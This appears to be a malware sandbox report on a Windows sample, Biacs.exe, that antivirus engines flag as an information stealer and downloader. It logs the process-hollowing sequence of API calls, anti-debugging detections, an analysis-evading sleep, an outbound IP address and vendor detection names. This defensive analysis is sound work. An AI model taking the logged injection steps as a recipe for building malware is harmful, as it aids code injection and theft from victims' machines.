GetAdaptersAddresses Nov. 1, 2023, 7:32 p.m.	flags: 1158 family: 0	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 1, 2023, 7:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Nov. 1, 2023, 7:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

192.3.64.154

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2756 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004b4	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Nov. 1, 2023, 7:32 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

Biacs.exe tried to sleep 2728263 seconds, actually delayed analysis time by 2728263 seconds

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 1, 2023, 7:32 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $±lÁõ}õ}õ}Ò»Íö}Ò»Ïô}Ò»Îô}Richõ}PEL á>àÖàð@ð@.textÕÖ ` base_address: 0x00400000 process_identifier: 2756 process_handle: 0x000004b4	1	1	0
WriteProcessMemory Nov. 1, 2023, 7:32 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2756 process_handle: 0x000004b4	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 1, 2023, 7:32 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $±lÁõ}õ}õ}Ò»Íö}Ò»Ïô}Ò»Îô}Richõ}PEL á>àÖàð@ð@.textÕÖ ` base_address: 0x00400000 process_identifier: 2756 process_handle: 0x000004b4	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 called NtSetContextThread to modify thread in remote process 2756
NtSetContextThread Nov. 1, 2023, 7:32 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199136 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000260 process_identifier: 2756	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2756
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 2756	1	0	0

Executed a process and injected code into it, probably while unpacking (18 events)

Time & API	Arguments	Status	Return
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x000003a4 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x000003e4 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x000003f8 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 2552	1	0
CreateProcessInternalW Nov. 1, 2023, 7:32 p.m.	thread_identifier: 2760 thread_handle: 0x00000260 process_identifier: 2756 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\Biacs.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000004b4	1	1
NtGetContextThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x00000260	1	0
NtAllocateVirtualMemory Nov. 1, 2023, 7:32 p.m.	process_identifier: 2756 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004b4	1	0
WriteProcessMemory Nov. 1, 2023, 7:32 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $±lÁõ}õ}õ}Ò»Íö}Ò»Ïô}Ò»Îô}Richõ}PEL á>àÖàð@ð@.textÕÖ ` base_address: 0x00400000 process_identifier: 2756 process_handle: 0x000004b4	1	1
WriteProcessMemory Nov. 1, 2023, 7:32 p.m.	buffer: base_address: 0x00401000 process_identifier: 2756 process_handle: 0x000004b4	1	1
WriteProcessMemory Nov. 1, 2023, 7:32 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2756 process_handle: 0x000004b4	1	1
NtSetContextThread Nov. 1, 2023, 7:32 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199136 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000260 process_identifier: 2756	1	0
NtResumeThread Nov. 1, 2023, 7:32 p.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 2756	1	0

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

MicroWorld-eScan	Gen:Variant.Marsilia.82052
Skyhigh	Artemis!Trojan
McAfee	Artemis!8BBBA1D14488
Malwarebytes	Trojan.MalPack.MSIL.Generic
Sangfor	Infostealer.Msil.Agent.V2ff
BitDefender	Gen:Variant.Marsilia.82052
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.PVC
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
Alibaba	TrojanSpy:MSIL/Stealer.129fe875
Rising	Stealer.Agent!8.C2 (CLOUD)
Sophos	Mal/Generic-S
FireEye	Gen:Variant.Marsilia.82052
Emsisoft	Gen:Variant.Marsilia.82052 (B)
GData	Gen:Variant.Marsilia.82052
MAX	malware (ai score=82)
Kingsoft	malware.kb.c.709
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
Microsoft	Trojan:Win32/Wacatac.B!ml
BitDefenderTheta	Gen:NN.ZemsilF.36792.em0@aSswu0l
DeepInstinct	MALICIOUS
Cylance	unsafe
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Agent.PVC!tr.dldr
AVG	Win32:PWSX-gen [Trj]
Avast	Win32:PWSX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

Biacs.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All